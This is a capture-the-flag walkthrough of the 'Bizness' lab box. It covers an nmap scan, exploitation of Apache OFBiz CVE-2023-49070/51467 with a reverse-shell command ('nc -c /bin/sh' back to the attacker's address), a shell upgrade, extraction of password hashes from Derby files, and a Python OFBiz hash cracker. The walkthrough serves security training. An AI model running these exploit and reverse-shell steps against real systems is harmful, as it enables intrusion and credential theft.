This writeup covers Bizness, an easy-level Capture The Flag (CTF) box. It walks through the fundamentals in order: host mapping, the Apache OFBiz foothold, and a password-reuse privilege escalation, with each step kept simple enough for players at this level.

Add Hosts

10.10.11.252 bizness.htb

Script to add the host entry automatically (idempotent: the grep check prevents a duplicate line when it is re-run)

ip="10.10.11.252"
domain="bizness.htb"
# append only if an identical entry is not already present
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bizness.htb
Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.051s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open  ssl/http nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|_  http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 only redirects to https://bizness.htb/, so the web content lives on 443 behind nginx 1.18.0. Brute-force the TLS site for directories:

dirb 'https://bizness.htb/'

dirb turns up the OFBiz accounting application:

https://bizness.htb/accounting/control/main

The page footer identifies the stack:

Powered by Apache OFBiz. Release 18

Foothold

Apache OFBiz 18.12 releases are affected by CVE-2023-49070 (pre-authentication remote code execution through the deprecated XML-RPC endpoint, reached via Java deserialization; fixed in 18.12.10) and CVE-2023-51467 (an authentication bypass, originally reported as leading to SSRF, that lets an unauthenticated request reach the same code path on 18.12.10; fixed in 18.12.11). The footer only says "Release 18", so the exact version is unconfirmed, but the public proof of concept below works against this box.

Start a listener on the attacking machine (in a separate terminal), then run the public exploit with a reverse-shell payload:

nc -lvnp 9001
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
cd Apache-OFBiz-Authentication-Bypass
# attacker's VPN address; assumes the VPN interface is tun0
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python exploit.py --url 'https://bizness.htb' --cmd "nc -c /bin/sh $vpnip 9001"

The payload relies on the target's nc supporting -c (execute a command after connecting), which it does here. If a target's netcat lacks -c, a bash /dev/tcp reverse shell is the usual fallback.

Get an Interactive Shell: once the reverse shell connects, upgrade it to a full TTY. In the remote shell, spawn a pseudo-terminal:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run in the local terminal (stty size only prints the local terminal's rows and columns, useful if the remote side needs them set later; stty raw -echo passes control characters such as Ctrl+C through to the remote shell instead of killing it):

stty size; stty raw -echo; fg

As the last step, set the terminal environment in the remote shell, then read the user flag:

export TERM=xterm
cat /home/ofbiz/user.txt
Privilege Escalation

OFBiz keeps its data in an embedded Apache Derby database under /opt/ofbiz/runtime, and the UserLogin table's currentPassword column holds the hashes of the OFBiz login accounts. The Derby segment files are binary, so grep them with --binary-files=text:

grep --binary-files=text -rni 'currentpassword' /opt/ofbiz/runtime

This turns up the hash $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I. OFBiz stores passwords as $<algorithm>$<salt>$<digest>, where the digest is URL-safe Base64 (padding stripped) of SHA-1 over the salt followed by the password; a generic SHA-1 cracker will not match that encoding, so use a cracker that implements the scheme:

git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker
cd Apache-OFBiz-SHA1-Cracker
python OFBiz-crack.py --hash-string '$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I' --wordlist '/usr/share/dict/rockyou.txt'

This yields monkeybizness
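As an added illustration of that hash format (this is example code written for this writeup, not code from the box, from OFBiz or from the duck-sec cracker), the following Python reproduces the OFBiz HashCrypt scheme and cracks the recovered hash against a small wordlist constructed inline in place of rockyou.txt. It assumes the scheme described above: digest = URL-safe Base64 of ALG(salt || password) with '=' padding stripped, and ALG "SHA" meaning SHA-1. It goes slightly beyond the page by also accepting the other digest names OFBiz can store (SHA-256, SHA-512, MD5).

```python
"""
Reproduce the OFBiz '$ALG$salt$digest' password hash and crack it by wordlist.

Assumption (how org.apache.ofbiz.base.crypto.HashCrypt builds hashes):
    digest = base64url( ALG( salt_bytes || password_bytes ) ) with '=' padding removed
    ALG "SHA" is Java's name for SHA-1.
The wordlist below is constructed for this example so it runs offline.
"""
import base64
import hashlib
from typing import Iterable, Optional, Tuple

# Java MessageDigest names OFBiz may store -> hashlib constructors
ALGORITHMS = {
    "SHA": hashlib.sha1,
    "SHA-1": hashlib.sha1,
    "SHA-256": hashlib.sha256,
    "SHA-512": hashlib.sha512,
    "MD5": hashlib.md5,
}


def parse_ofbiz_hash(hash_string: str) -> Tuple[str, str, str]:
    """Split '$ALG$salt$digest' into (alg, salt, digest); reject anything else."""
    if not hash_string.startswith("$"):
        raise ValueError("not a salted OFBiz hash (expected leading '$')")
    parts = hash_string.split("$")          # ['', ALG, salt, digest]
    if len(parts) != 4 or not parts[1] or not parts[3]:
        raise ValueError("malformed OFBiz hash: %r" % hash_string)
    _, alg, salt, digest = parts
    if alg not in ALGORITHMS:
        raise ValueError("unsupported algorithm %r" % alg)
    return alg, salt, digest


def ofbiz_digest(alg: str, salt: str, password: str) -> str:
    """Return the digest field OFBiz stores for this salt/password pair."""
    h = ALGORITHMS[alg]()
    h.update(salt.encode("utf-8"))       # salt first ...
    h.update(password.encode("utf-8"))   # ... then the password, as HashCrypt does
    # Base64.encodeBase64URLSafeString: '-' '_' alphabet, no '=' padding
    return base64.urlsafe_b64encode(h.digest()).decode("ascii").rstrip("=")


def ofbiz_hash(password: str, salt: str, alg: str = "SHA") -> str:
    """Build the full '$ALG$salt$digest' string as found in UserLogin.currentPassword."""
    return "$%s$%s$%s" % (alg, salt, ofbiz_digest(alg, salt, password))


def crack(hash_string: str, candidates: Iterable[str]) -> Optional[str]:
    """Try each candidate (line endings stripped); return the first match or None."""
    alg, salt, digest = parse_ofbiz_hash(hash_string)
    for candidate in candidates:
        candidate = candidate.rstrip("\r\n")
        if ofbiz_digest(alg, salt, candidate) == digest:
            return candidate
    return None


# Constructed wordlist standing in for rockyou.txt for this example.
SAMPLE_WORDLIST = ["password", "123456", "bizness", "monkeybizness", "admin"]

if __name__ == "__main__":
    recovered = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"   # hash pulled from the Derby files
    print(crack(recovered, SAMPLE_WORDLIST))
```

To use a real wordlist, pass an open file object to crack(); it strips line endings as it iterates, so the file is never read into memory at once.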

The same password is reused for the root account, so switch user (entering monkeybizness at the prompt) and read the root flag:

su
cat /root/root.txt